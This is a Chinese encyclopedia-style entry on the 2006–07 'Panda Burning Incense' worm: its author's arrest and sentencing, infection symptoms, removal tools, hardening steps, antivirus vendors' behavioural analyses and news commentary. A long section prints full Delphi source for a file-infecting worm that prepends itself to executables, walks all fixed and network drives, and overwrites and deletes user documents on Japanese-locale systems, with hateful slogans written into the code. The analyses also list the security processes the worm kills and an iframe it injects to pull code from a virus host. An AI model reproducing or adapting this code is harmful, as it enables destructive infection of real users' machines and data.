【熊猫烧香】
释义:①为电脑爱好者创造了一句新问候语:今天你烧了吗?②“微笑杀手”,可爱是它最好的伪装,温柔的一刀常常让人有砸电脑的冲动。
典故:一只熊猫拿着三支香,这个图像一度令电脑用户胆战心惊。从2006年底到2007年初,“熊猫烧香”在短短时间内通过网络传播全国,数百万台电脑中毒。2007年2月,“熊猫烧香”病毒设计者李俊归案,交出杀病毒软件。据李俊交代,其于2006年10月16日编制了“熊猫烧香”病毒并在网上广泛传播,还以自己出售和由他人代卖的方式,在网络上将该病毒销售给120余人,非法获利10万余元。9月24日,湖北省仙桃市法院一审以破坏计算机信息系统罪判处李俊有期徒刑4年。这是我国侦破的国内首例制作计算机病毒的大案。具有讽刺意味的是,李俊因就业无门而制造病毒予以发泄,案发后,却有十多家网络公司与他联系,甚至有公司欲以100万年薪邀请他加盟。
例句:①“熊猫烧香”是一个草根成名的畸形标本。②“熊猫烧香”案带出黑色病毒产业链。
关联词:病毒、李俊、互联网犯罪
【基本信息】病毒名称:熊猫烧香,worm.whboy.(金山称),worm.nimaya.(瑞星称)
病毒别名:尼姆亚,武汉男生,后又化身为“金猪报喜”
危险级别:★★★★★
病毒类型:蠕虫病毒,能够终止大量的反病毒软件和防火墙软件进程。
影响系统:win9x/me、win2000/nt、winxp、win2003
【病毒描述】
其实是一种蠕虫病毒的变种,而且是经过多次变种而来的。尼姆亚变种w(worm.nimaya.w),由于中毒电脑的可执行文件会出现“熊猫烧香”图案,所以也被称为“熊猫烧香”病毒。用户电脑中毒后可能会出现蓝屏、频繁重启以及系统硬盘中数据文件被破坏等现象。同时,该病毒的某些变种可以通过局域网进行传播,进而感染局域网内所有计算机系统,最终导致企业局域网瘫痪,无法正常使用,它能感染系统中exe,com,pif,src,html,asp等文件,它还能中止大量的反病毒软件进程并且会删除扩展名为gho的文件,该文件是一系统备份工具ghost的备份文件,使用户的系统备份文件丢失。被感染的用户系统中所有.exe可执行文件全部被改成熊猫举着三根香的模样。
【中毒症状】
除了通过网站带毒感染用户之外,此病毒还会在局域网中传播,在极短时间之内就可以感染几千台计算机,严重时可以导致网络瘫痪。中毒电脑上会出现“熊猫烧香”图案,所以也被称为“熊猫烧香”病毒。中毒电脑会出现蓝屏、频繁重启以及系统硬盘中数据文件被破坏等现象。
【危害】
病毒会删除扩展名为gho的文件,使用户无法使用ghost软件恢复操作系统。“熊猫烧香”感染系统
的.exe.com.pif.srcl.asp文件,添加病毒网址,导致用户一打开这些网页文件,ie就会自动连接到指定的病毒网址中下载病毒。在硬盘各个分区下生成文件autorun.inf和setup.exe,可以通过u盘和移动硬盘等方式进行传播,并且利用windows系统的自动播放功能来运行,搜索硬盘中的.exe可执行文件并感染,感染后的文件图标变成“熊猫烧香”图案。“熊猫烧香”还可以通过共享文件夹、系统弱口令等多种方式进行传播。该病毒会在中毒电脑中所有的网页文件尾部添加病毒代码。一些网站编辑人员的电脑如果被该病毒感染,上传网页到网站后,就会导致用户浏览这些网站时也被病毒感染。据悉,多家著名网站已经遭到此类攻击,而相继被植入病毒。由于这些网站的浏览量非常大,致使“熊猫烧香”病毒的感染范围非常广,中毒企业和政府机构已经超过千家,其中不乏金融、税务、能源等关系到国计民生的重要单位。注:江苏等地区成为“熊猫烧香”重灾区。
【杀毒方法】
各种版本的熊猫烧香专杀
瑞星:http://it.rising.com.cn/channels/service/2006-11/1163505486d38734.shtml
金山:http://tool.duba.net/zhuansha/253.shtml
江民:http://www.jiangmin.com/download/zhuansha04
超级巡警:http://www.dswlab.com/dow/d2l
李俊:http://www.xdowns.com/soft/8/21/2007/soft_34735l虽然用户及时更新杀毒软件病毒库,并下载各杀毒软件公司提供的专杀工具,即可对“熊猫烧香”病毒进行查杀,但是如果能做到防患于未然岂不更好。
【解决办法】
【1】立即检查本机administrator组成员口令,一定要放弃简单口令甚至空口令,安全的口令是字母数字特殊字符的组合,自己记得住,别让病毒猜到就行。
修改方法:右键单击我的电脑,选择管理,浏览到本地用户和组,在右边的窗格中,选择具备管理员权限的用户名,单击右键,选择设置密码,输入新密码就行。
【2】利用组策略,关闭所有驱动器的自动播放功能。
步骤:单击开始,运行,输入gpedit.msc,打开组策略编辑器,浏览到计算机配置,管理模板,系统,在右边的窗格中选择关闭自动播放,该配置缺省是未配置,在下拉框中选择所有驱动器,再选取已启用,确定后关闭。最后,在开始,运行中输入gpupdate,确定后,该策略就生效了。
【3】修改文件夹选项,以查看不明文件的真实属性,避免无意双击骗子程序中毒。
步骤:打开资源管理器(按windows徽标键+e),点工具菜单下文件夹选项,再点查看,在高级设置中,选择查看所有文件,取消隐藏受保护的操作系统文件,取消隐藏文件扩展名。
【4】时刻保持操作系统获得最新的安全更新,不要随意访问来源不明的网站,特别是微软的ms06-014漏洞,应立即打好该漏洞补丁。
同时,qq、uc的漏洞也可以被该病毒利用,因此,用户应该去他们的官方网站打好最新补丁。此外,由于该病毒会利用ie浏览器的漏洞进行攻击,因此用户还应该给ie打好所有的补丁。如果必要的话,用户可以暂时换用firefox、opera等比较安全的浏览器。
【5】启用windows防火墙保护本地计算机。同时,局域网用户尽量避免创建可写的共享目录,已经创建共享目录的应立即停止共享。
此外,对于未感染的用户,病毒专家建议,不要登录不良网站,及时下载微软公布的最新补丁,来避免病毒利用漏洞袭击用户的电脑,同时上网时应采用“杀毒软件+防火墙”的立体防御体系。
【变种病毒】
至此,据不完全统计,仅12月份至今,变种数已达90多个,个人用户感染熊猫烧香的已经高达几百万,企业用户感染数还在继续上升。反防毒专家表示,伴随着各大杀毒厂商对“熊猫烧香”病毒的集中绞杀,该病毒正在不断“繁衍”新的变种,密谋更加隐蔽的传播方式。反病毒专家建议,用户不打开可疑邮件和可疑网站,不要随便运行不知名程序或打开陌生人邮件的附件。
【破案介绍】
我国破获的国内首例制作计算机病毒的大案
[2007年2月12日]湖北省公安厅12日宣布,根据统一部署,湖北网监在浙江、山东、广西、天津、广东、四川、江西、云南、新疆、河南等地公安机关的配合下,一举侦破了制作传播“熊猫烧香”病毒案,抓获病毒作者李俊(男,25岁,武汉新洲区人),他于2006年10月16日编写了“熊猫烧香”病毒并在网上广泛传播,并且还以自己出售和由他人代卖的方式,在网络上将该病毒销售给120余人,非法获利10万余元。
其他重要犯罪嫌疑人:雷磊(男,25岁,武汉新洲区人)、王磊(男,22岁,山东威海人)、叶培新(男,21岁,浙江温州人)、张顺(男,23岁,浙江丽水人)、王哲(男,24岁,湖北仙桃人)通过改写、传播“熊猫烧香”等病毒,构建“僵尸网络”,通过盗窃各种游戏账号等方式非法牟利。
这是中国近些年来,发生比较严重的一次蠕虫病毒发作。影响较多公司,造成较大的损失。且对于一些疏于防范的用户来说,该病毒导致较为严重的损失。
由于此病毒可以盗取用户名与密码,因此,带有明显的牟利目的。所以,作者才有可能将此病毒当作商品出售,与一般的病毒制作者只是自娱自乐、或显示威力、或炫耀技术有很大的不同。
另,制作者李俊在被捕后,在公安的监视下,又在编写解毒软件。
【传播方法】
“熊猫烧香”还可以通过共享文件夹、系统弱口令等多种方式进行传播。
金山分析:这是一个感染型的蠕虫病毒,它能感染系统中exe,com,pif,src,html,asp等文件,它还能中止大量的反病毒软件进程
1拷贝文件
病毒运行后,会把自己拷贝到
c:\windows\system32\drivers\spoclsv.exe
2添加注册表自启动
病毒会添加自启动项
hkey_current_user\software\microsoft\windows\currentversion\run
svcshare->c:\windows\system32\drivers\spoclsv.exe
3病毒行为
a:每隔1秒
寻找桌面窗口,并关闭窗口标题中含有以下字符的程序
qqkav
qqav
防火墙
进程
virusscan
网镖
杀毒
毒霸
瑞星
江民
黄山ie
超级兔子
优化大师
木马克星
木马清道夫
qq病毒
注册表编辑器
系统配置实用程序
卡巴斯基反病毒
symantecantivirus
duba
esteemproces
绿鹰pc
密码防盗
噬菌体
木马辅助查找器
systemsafetymonitor
wrappedgiftkiller
winsockexpert
游戏木马检测大师
msctls_statusbar32
pjf(ustc)
icesword
并使用的键盘映射的方法关闭安全软件icesword
添加注册表使自己自启动
hkey_current_user\software\microsoft\windows\currentversion\run
svcshare->c:\windows\system32\drivers\spoclsv.exe
并中止系统中以下的进程:
mcshield.exe
vstskmgr.exe
naprdmgr.exe
updaterui.exe
tbmon.exe
scan32.exe
ravmond.exe
ccenter.exe
ravtask.exe
rav.exe
ravmon.exe
ravmond.exe
ravstub.exe
kvxp.kxp
kvmonxp.kxp
kvcenter.kxp
kvsrvxp.exe
kregex.exe
uihost.exe
trojdie.kxp
frogagent.exe
logo1_.exe
logo_1.exe
rundl132.exe
b:每隔18秒
点击病毒作者指定的网页,并用命令行检查系统中是否存在共享
共存在的话就运行netshare命令关闭admin$共享
c:每隔10秒
下载病毒作者指定的文件,并用命令行检查系统中是否存在共享
共存在的话就运行netshare命令关闭admin$共享
d:每隔6秒
删除安全软件在注册表中的键值
hkey_local_machine\software\microsoft\windows\currentversion\run
ravtask
kvmonxp
kav
kavpersonal50
mcafeeupdaterui
networkassociateserrorreportingservice
shstartexe
ylive.exe
yassistse
并修改以下值不显示隐藏文件
hkey_local_machine\software\microsoft\windows\currentversion\explorer\advanced\folder\hidden\showall
checkedvalue->0x00
删除以下服务:
navapsvc
wscsvc
kpfwsvc
sndsrvc
ccproxy
ccevtmgr
ccsetmgr
spbbcsvc
symanteccorelc
npfmntor
mskservice
firesvc
e:感染文件
病毒会感染扩展名为exe,pif,com,src的文件,把自己附加到文件的头部
并在扩展名为htm,html,asp,php,jsp,aspx的文件中添加一网址,
用户一但打开了该文件,ie就会不断的在后台点击写入的网址,达到
增加点击量的目的,但病毒不会感染以下文件夹名中的文件:
window
winnt
systemvolumeinformation
recycled
windowsnt
windowsupdate
windowsmediaplayer
outlookexpress
internetexplorer
netmeeting
commonfiles
complusapplications
messenger
installshieldinstallationinformation
msn
microsoftfrontpage
moviemaker
msngaminzone
g:删除文件
病毒会删除扩展名为gho的文件,该文件是一系统备份工具ghost的备份文件
使用户的系统备份文件丢失.
瑞星最新病毒分析报告:“nimaya(熊猫烧香)”
这是一个传染型的download使用delphi编写
【传播对象和运行过程】
★本地磁盘感染
病毒对系统中所有除了盘符为a,b的磁盘类型为drive_remote,drive_fixed的磁盘进行文件遍历感染
注:不感染文件大小超过10485760字节以上的.
(病毒将不感染如下目录的文件):
microsoftfrontpage
moviemaker
msngaminzone
commonfiles
windowsnt
recycled
systemvolumeinformation
documentsandsettings
……
(病毒将不感染文件名如下的文件):
setup.exe
ntdetect.com
病毒将使用两类感染方式应对不同后缀的文件名进行感染
1)二进制可执行文件(后缀名为:exe,scr,pif,com):将感染目标文件和病毒溶合成一个文件(被感染文件贴在病毒文件尾部)完成感染.
2)脚本类(后缀名为:htm,html,asp,php,jsp,aspx):在这些脚本文件尾加上如下链接(下边的页面存在安全漏洞):
<iframesrc=http://www.krvkr.com/wormwidth=height=0></iframe>
在感染时会删除这些磁盘上的后缀名为.gho
2.★生成autorun.inf
病毒建立一个计时器以,6秒为周期在磁盘的根目录下生成setup.exe(病毒本身)autorun.inf并利用autorunopen关联使病毒在用户点击被感染磁盘时能被自动运行。
3.★局域网传播
病毒生成随机个局域网传播线程实现如下的传播方式:
当病毒发现能成功联接攻击目标的139或445端口后,将使用内置的一个用户列表及密码字典进行联接。(猜测被攻击端的密码)当成功的联接上以后将自己复制过去并利用计划任务启动激活病毒。
修改操作系统的启动关联
下载文件启动
与杀毒软件对抗
【一些报道和评论】
“‘流氓软件’和病毒之间的界限已变得越来越模糊。为了达到更好的传播效果,并减少成本,不少中小厂商直接使用病毒进行‘流氓推广’。”昨日,反病毒专家直指流氓软件是这次“熊猫烧香”幕后黑手。
据江民公司反病毒工程师称,已经发现了近期疯狂肆虐的“熊猫烧香”幕后势力的痕迹,“熊猫烧香”病毒被怀疑是由“超级巡警”软件的提供方在幕后推动,网上已经发现了产销一条龙盗窃销售网游设备的产业链。
而从瑞星截获的“熊猫烧香(worm.nimaya)”样本进行分析,也有不少变种运行后会去从网上下载盗取“江湖”、“大话西游”、“魔兽”等网络游戏账号的木马。用户的计算机一旦被感染这些木马,游戏的账号、装备等就会被黑客窃取。黑客通过在网上倒卖网游账号、装备等获利。
流氓软件分化:部分“洗白”部分病毒化。全民范围内的讨伐使流氓软件开始出现“分化”。
北京瑞星股份有限公司反病毒工程师史瑀向《每日经济新闻》表示,迫于技术和舆论的压力,制作流氓软件的厂商开始两极分化。一些大牌互联网厂商逐渐“洗白”,将软件的“流氓”程度降低,还有一些厂商干脆放弃推广“流氓软件”。然而,仍有大量的中小厂商是通过“流氓软件”起家的,通过“流氓软件”进行广告推广已经成为其公司主要甚至是唯一的收入来源。2006年下半年开始,一些厂商为了生存,不惜铤而走险,使用更加卑劣的手段进行流氓推广,并且采用更加恶毒的技术公然向反病毒软件、反流氓软件工具挑战。
据瑞星公司客户服务中心的统计数据表明,从2006年6月开始,用户计算机由于流氓软件问题导致崩溃的求助数量已经超过了病毒。
据专家介绍,这一时期的“流氓软件”有两大特点:一是编写病毒化。不少“流氓软件”为了防止被杀毒软件或流氓软件卸载工具发现,采用了病毒常用的rootkit技术进行自我保护。rootkit可以对自身及指定的文件进行隐藏或锁定,防止被发现和删除。带有rootkit的“流氓软件”就像练就了“金钟罩”、“铁布杉”,不除去这层保护根本难伤其毫发。更有一些流氓软件,采用“自杀式”技术攻击杀毒软件。一旦发现用户安装或运行杀毒软件,便运行恶意代码,直接造成计算机死机、蓝屏,让用户误以为是杀毒软件存在问题。
二是传播病毒化。为了达到更好的传播效果,并减小成本,不少中小厂商直接使用病毒进行“流氓推广”。用户的计算机感染病毒后,病毒会自动在后台运行,下载并安装“流氓软件”。同时,“流氓软件”安装后也会去从互联网自动下载运行病毒。大量的“流氓软件”开始使用电脑病毒来隐藏自身、进行快速传播、并对抗用户的清除等,这些行为严重危害到用户的信息安全和利益。“流氓软件”和病毒之间的界限已变得越来越模糊。随着“流氓软件”不断朝着病毒的方向发展,要想彻底杀灭“流氓软件”就必须采用反病毒技术。
利益驱使流氓软件制造“熊猫烧香”?
史瑀表示,2006年11月14日,瑞星发布流氓软件专用清除工具———卡卡上网安全助手3.0,首次将反病毒技术应用于反流氓软件当中。就在卡卡刚刚发布24小时,就有一个名为“my123”的恶意程序顶风作案,疯狂采用病毒化的编写技术来逃避卡卡的追杀,随后又出现了名为“3448.com”和“7939.com”两个流氓软件,它们锁定用户浏览器的首页以提高其网站访问量。
此后,部分流氓软件开始和病毒合作。早先一个传播较广的蠕虫病毒“威金蠕虫(worm.viking)”,就会从病毒作者指定的网站去下载流氓软件、盗号木马等,并种植在用户的计算机上。
“大量‘流氓软件’开始使用电脑病毒来隐藏自身、进行快速传播、并对抗用户的清除等,这些行为严重危害到用户的信息安全和利益。”史瑀称,“‘熊猫烧香’病毒成为一个‘教科书’式的病毒,势必有大量的病毒会模仿它的特征进行编写。”
1月29日,金山毒霸反病毒中心最新消息:“熊猫烧香”化身“金猪”,危害指数再度升级,按照目前“熊猫烧香”破坏程度,威胁将延伸至春节。而在瑞星全球反病毒监测网27日监测结果显示,27日一个“电眼间谍变种bsf(trojan.spy.delf.bsf)”病毒又出现,该病毒与“熊猫烧香”病毒类似。
而业内人士称,近日由于地震引起海底光缆中断,造成数百万使用国外杀毒软件的个人用户、数十万企业和政府局域网用户无法升级。这又意味着这些用户的电脑完全向病毒和黑客敞开了大门。
“在没有法律法规出台前,流氓软件是不会缩手的,不排除‘熊猫烧香’是流氓软件所为。”昨日,中国反流氓软件联盟李佳衡表示:“只要有利益驱使,流氓软件就会变化形式,以更不容易察觉的病毒方式毫无忌惮地牟取利益。”
熊猫烧香”化身“金猪”,春节大爆发。
“长假是病毒的高发期,特别是长假之后,病毒综合症接踵而来。”金山毒霸反病毒专家戴光剑说,“目前我们已经截获‘金猪’的变种。被感染的电脑中不但‘熊猫’成群,而且‘金猪’能使系统被破坏,大量软件无法应用。”这一观点得到了上海市计算机病毒防范服务中心的认同。
一旦中毒,用户也不用慌张,用户可拨打上海市信息化服务热线电话9682000寻求帮助。张丹
“熊猫烧香”病毒攻略:防御和解除方法
计世网消息在2007年新年出现的“pe_fujacks”就是最近让广大互联网用户闻之色变的“熊猫烧香”。该病毒的作者为“武汉男生”(文件末签名”whboy”),这个版本的病毒已经集成了pe_fujack和qq大盗的代码,通过网络共享,文件感染和移动存储设备传播,尤其是感染网页文件,并在网页文件写入自动更新的代码,一旦浏览该网页,就会感染更新后的变种。
不幸中招的用户都知道,“熊猫烧香”会占用局域网带宽,使得电脑变得缓慢,计算机会出现以下症状:熊猫烧香病毒会在网络共享文件夹中生成一个名为gamesetup.exe的病毒文件;结束某些应用程序以及防毒软件的进程,导致应用程序异常,或不能正常执行,或速度变慢;硬盘分区或者u盘不能访问使用;exe程序无法使用程序图标变成熊猫烧香图标;硬盘的根目录出现setup.exeauturun.inf文件;同时浏览器会莫名其妙地开启或关闭。
该病毒主要通过浏览恶意网站、网络共享、文件感染和移动存储设备(如u盘)等途径感染,其中网络共享和文件感染的风险系数较高,而通过web和移动存储感染的风险相对较低。该病毒会自行启动安装,生成注册列表和病毒文件%system%\drivers\spoclsv.exe,并在所有磁盘跟目录下生成病毒文件setup.exe,autorun.inf。
【熊猫烧香的病毒源码】
programjapussy;
uses
windows,sysutils,classes,graphics,shellapi{,registry};
const
headersize=82432;//病毒体的大小
iconoffset=eb8;//pe文件主图标的偏移量
//在我的delphi5sp1上面编译得到的大小,其它版本的delphi可能不同
//查找2800000020的十六进制字符串可以找到主图标的偏移量
{
headersize=38912;//upx压缩过病毒体的大小
iconoffset=bc;//upx压缩过pe文件主图标的偏移量
//upx1.24w用法:upx-9--8086japussy.exe
}
iconsize=e8;//pe文件主图标的大小--744字节
icontail=iconoffset+iconsize;//pe文件主图标的尾部
id=444444;//感染标记
//垃圾码,以备写入
catchword='ifaraceneedtobekilledout,itmustbeyamato.'+
'ifacountryneedtobedestroyed,itmustbejapan!'+
'***w32.japussy.worm.a***';
{$r*.res}
functionregisterserviceprocess(dwprocessid,dwtype:integer):integer;
stdcall;external'kernel32.dll';//函数声明
var
tmpfile:string;
si:startupinfo;
pi:process_information;
isjap:boolean=false;//日文操作系统标记
{判断是否为win9x}
functioniswin9x:boolean;
var
ver:tosversioninfo;
begin
result:=false;
ver.dwosversioninfosize:=sizeof(tosversioninfo);
ifnotgetversionex(ver)then
exit;
if(ver.dwplatformid=ver_platform_win32_windows)then//win9x
result:=true;
end;
{在流之间复制}
procedurecopystream(src:tstream;sstartpos:integer;dst:tstream;
dstartpos:integer;count:integer);
var
scurpos,dcurpos:integer;
begin
scurpos:=src.position;
dcurpos:=dst.position;
src.seek(sstartpos,0);
dst.seek(dstartpos,0);
dst.copyfrom(src,count);
src.seek(scurpos,0);
dst.seek(dcurpos,0);
end;
{将宿主文件从已感染的pe文件中分离出来,以备使用}
procedureextractfile(filename:string);
var
sstream,dstream:tfilestream;
begin
try
sstream:=tfilestream.create(paramstr(0),fmopenreadorfmsharedenynone);
try
dstream:=tfilestream.create(filename,fmcreate);
try
sstream.seek(headersize,0);//跳过头部的病毒部分
dstream.copyfrom(sstream,sstream.size-headersize);
finally
dstream.free;
end;
finally
sstream.free;
end;
except
end;
end;
{填充startupinfo结构}
procedurefillstartupinfo(varsi:startupinfo;state:word);
begin
si.cb:=sizeof(si);
si.lpreserved:=nil;
si.lpdesktop:=nil;
si.lptitle:=nil;
si.dwflags:=startf_useshowwindow;
si.wshowwindow:=state;
si.cbreserved2:=0;
si.lpreserved2:=nil;
end;
{发带毒邮件}
proceduresendmail;
begin
//邮件终止
end;
{感染pe文件}
procedureinfectonefile(filename:string);
var
hdrstream,srcstream:tfilestream;
icostream,dststream:tmemorystream;
iid:longint;
aicon:ticon;
infected,ispe:boolean;
i:integer;
buf:array[0..1]ofchar;
begin
try//出错则文件正在被使用,退出
ifcomparetext(filename,'japussy.exe')=0then//是自己则不感染
exit;
infected:=false;
ispe:=false;
srcstream:=tfilestream.create(filename,fmopenread);
try
fori:=0to8do//检查pe文件头
begin
srcstream.seek(i,sofrombeginning);
srcstream.read(buf,2);
if(buf[0]=#80)and(buf[1]=#69)then//pe标记
begin
ispe:=true;//是pe文件
break;
end;
end;
srcstream.seek(-4,sofromend);//检查感染标记
srcstream.read(iid,4);
if(iid=id)or(srcstream.size<10240)then//太小的文件不感染
infected:=true;
finally
srcstream.free;
end;
ifinfectedor(notispe)then//如果感染过了或不是pe文件则退出
exit;
icostream:=tmemorystream.create;
dststream:=tmemorystream.create;
try
aicon:=ticon.create;
try
//得到被感染文件的主图标(744字节),存入流
aicon.releasehandle;
aicon.handle:=extracticon(hinstance,pchar(filename),0);
aicon.savetostream(icostream);
finally
aicon.free;
end;
srcstream:=tfilestream.create(filename,fmopenread);
//头文件
hdrstream:=tfilestream.create(paramstr(0),fmopenreadorfmsharedenynone);
try
//写入病毒体主图标之前的数据
copystream(hdrstream,0,dststream,0,iconoffset);
//写入目前程序的主图标
copystream(icostream,22,dststream,iconoffset,iconsize);
//写入病毒体主图标到病毒体尾部之间的数据
copystream(hdrstream,icontail,dststream,icontail,headersize-icontail);
//写入宿主程序
copystream(srcstream,0,dststream,headersize,srcstream.size);
//写入已感染的标记
dststream.seek(0,2);
iid:=444444;
dststream.write(iid,4);
finally
hdrstream.free;
end;
finally
srcstream.free;
icostream.free;
dststream.savetofile(filename);//替换宿主文件
dststream.free;
end;
except;
end;
end;
{将目标文件写入垃圾码后删除}
proceduresmashfile(filename:string);
var
filehandle:integer;
i,size,mass,max,len:integer;
begin
try
setfileattributes(pchar(filename),0);//去掉只读属性
filehandle:=fileopen(filename,fmopenwrite);//打开文件
try
size:=getfilesize(filehandle,nil);//文件大小
i:=0;
randomize;
max:=random(15);//写入垃圾码的随机次数
ifmax<5then
max:=5;
mass:=sizedivmax;//每个间隔块的大小
len:=length(catchword);
whilei<maxdo
begin
fileseek(filehandle,i*mass,0);//定位
//写入垃圾码,将文件彻底破坏掉
filewrite(filehandle,catchword,len);
inc(i);
end;
finally
fileclose(filehandle);//关闭文件
end;
deletefile(pchar(filename));//删除之
except
end;
end;
{获得可写的驱动器列表}
functiongetdrives:string;
var
disktype:word;
d:char;
str:string;
i:integer;
begin
fori:=0to25do//遍历26个字母
begin
d:=chr(i+65);
str:=d+':\';
disktype:=getdrivetype(pchar(str));
//得到本地磁盘和网络盘
if(disktype=drive_fixed)or(disktype=drive_remote)then
result:=result+d;
end;
end;
{遍历目录,感染和摧毁文件}
procedureloopfiles(path,mask:string);
var
i,count:integer;
fn,ext:string;
subdir:tstrings;
searchrec:tsearchrec;
msg:tmsg;
functionisvaliddir(searchrec:tsearchrec):integer;
begin
if(searchrec.attr<>16)and(searchrec.name<>'.')and
(searchrec.name<>'..')then
result:=0//不是目录
elseif(searchrec.attr=16)and(searchrec.name<>'.')and
(searchrec.name<>'..')then
result:=1//不是根目录
elseresult:=2;//是根目录
end;
begin
if(findfirst(path+mask,faanyfile,searchrec)=0)then
begin
repeat
peekmessage(msg,0,0,0,pm_remove);//调整消息队列,避免引起怀疑
ifisvaliddir(searchrec)=0then
begin
fn:=path+searchrec.name;
ext:=uppercase(extractfileext(fn));
if(ext='.exe')or(ext='.scr')then
begin
infectonefile(fn);//感染可执行文件
end
elseif(ext='')or(ext='l')or(ext='.asp')then
begin
//感染html和asp文件,将base64编码后的病毒写入
//感染浏览此网页的所有用户
//哪位大兄弟愿意完成之?
end
elseifext='.wab'then//outlook地址簿文件
begin
//获取outlook邮件地址
end
elseifext='.adc'then//foxmail地址自动完成文件
begin
//获取foxmail邮件地址
end
elseifext='ind'then//foxmail地址簿文件
begin
//获取foxmail邮件地址
end
else
begin
ifisjapthen//是倭文操作系统
begin
if(ext='.doc')or(ext='.xls')or(ext='.mdb')or
(ext='.mp3')or(ext='.rm')or(ext='.ra')or
(ext='.wma')or(ext='.zip')or(ext='.rar')or
(ext='.mpeg')or(ext='.asf')or(ext='.jpg')or
(ext='.jpeg')or(ext='.gif')or(ext='.swf')or
(ext='.pdf')or(ext='.chm')or(ext='.avi')then
smashfile(fn);//摧毁文件
end;
end;
end;
//感染或删除一个文件后睡眠200毫秒,避免cpu占用率过高引起怀疑
sleep(200);
until(findnext(searchrec)<>0);
end;
findclose(searchrec);
subdir:=tstringlist.create;
if(findfirst(path+'*.*',fadirectory,searchrec)=0)then
begin
repeat
ifisvaliddir(searchrec)=1then
subdir.add(searchrec.name);
until(findnext(searchrec)<>0);
end;
findclose(searchrec);
count:=subdir.count-1;
fori:=0tocountdo
loopfiles(path+subdir.strings+'\',mask);
freeandnil(subdir);
end;
{遍历磁盘上所有的文件}
procedureinfectfiles;
var
driverlist:string;
i,len:integer;
begin
ifgetacp=932then//日文操作系统
isjap:=true;//去死吧!
driverlist:=getdrives;//得到可写的磁盘列表
len:=length(driverlist);
whiletruedo//死循环
begin
fori:=lendownto1do//遍历每个磁盘驱动器
loopfiles(driverlist+':\','*.*');//感染之
sendmail;//发带毒邮件
sleep(1000*60*5);//睡眠5分钟
end;
end;
{主程序开始}
begin
ifiswin9xthen//是win9x
registerserviceprocess(getcurrentprocessid,1)//注册为服务进程
else//winnt
begin
//远程线程映射到explorer进程
//哪位兄台愿意完成之?
end;
//如果是原始病毒体自己
ifcomparetext(extractfilename(paramstr(0)),'japussy.exe')=0then
infectfiles//感染和发邮件
else//已寄生于宿主程序上了,开始工作
begin
tmpfile:=paramstr(0);//创建临时文件
delete(tmpfile,length(tmpfile)-4,4);
tmpfile:=tmpfile+#32+'.exe';//真正的宿主文件,多一个空格
extractfile(tmpfile);//分离之
fillstartupinfo(si,sw_showdefault);
createprocess(pchar(tmpfile),pchar(tmpfile),nil,nil,true,
0,nil,'.',si,pi);//创建新进程运行之
infectfiles;//感染和发邮件
end;
end.
【熊猫烧香的第一版作者道歉信】
各位网友:
你们好!我是熊猫烧香的第一版作者.
我真的没有想到熊猫烧香在短短的两个月竟然疯狂感染到这个地步,真的是我的不对,或许真的是我低估了网络的力量,它的散播速度是我想不到的!对于所有中毒的网友,企业来说,可能是一个很大的打击,我对此表示深深的歉意!很对不起!
我要解释一些事情,有人说熊猫烧香更改熊猫的图标是我在诋毁大熊猫!这里我要解释下,这是绝对没有的事情,完全是出于这个图片比较让我个人喜欢,才会用的!
还有关于变种,我写这个的初衷也是这个,纯粹是为了编程研究,对于出了这么多变种,我是根本想不到的,这个责任也不全是在我的!还有人说熊猫病毒写出来是商业目的!这个完全是无稽之谈.我在这里承诺,本人是绝对没有更新过任何变种!
关于中毒后的一些错误,有人中毒后会有蓝屏,无声,卡死,文件丢失这些现象!蓝屏和死机的原因很多可能,熊猫的主程序是不会造成电脑死机或蓝屏的,更不会把别人里面的文件弄丢失!
还有人说我是个心理变态,我在前面已经说了,感染的速度,变种的数量是我所料想不到的.还有,我写这个病毒的初衷完全是为了编程研究.对于这个评论,我也就不多说什么了!
最后就是关于我的身份,大家不要再猜测我是谁了,15岁的武汉男生也好,是个女的也好,某公司老总也好,杀毒厂商也好,光是新闻的评论,网友的臭骂已经让我后悔之极了!希望熊猫病毒不要再成为炒作的娱乐新闻,不要再出任何关于熊猫新闻和评论!希望安全软件公司,不要吹嘘,相互诋毁,相互炒作,尽力做出让人们信赖的好安全软件!谢谢大家!
这是我写的一个专杀程序,肯定是比不上专业级的杀毒软件了,但是我想这是我最后能给大家做的事情了.
熊猫走了,是结束吗?不是的,网络永远没有安全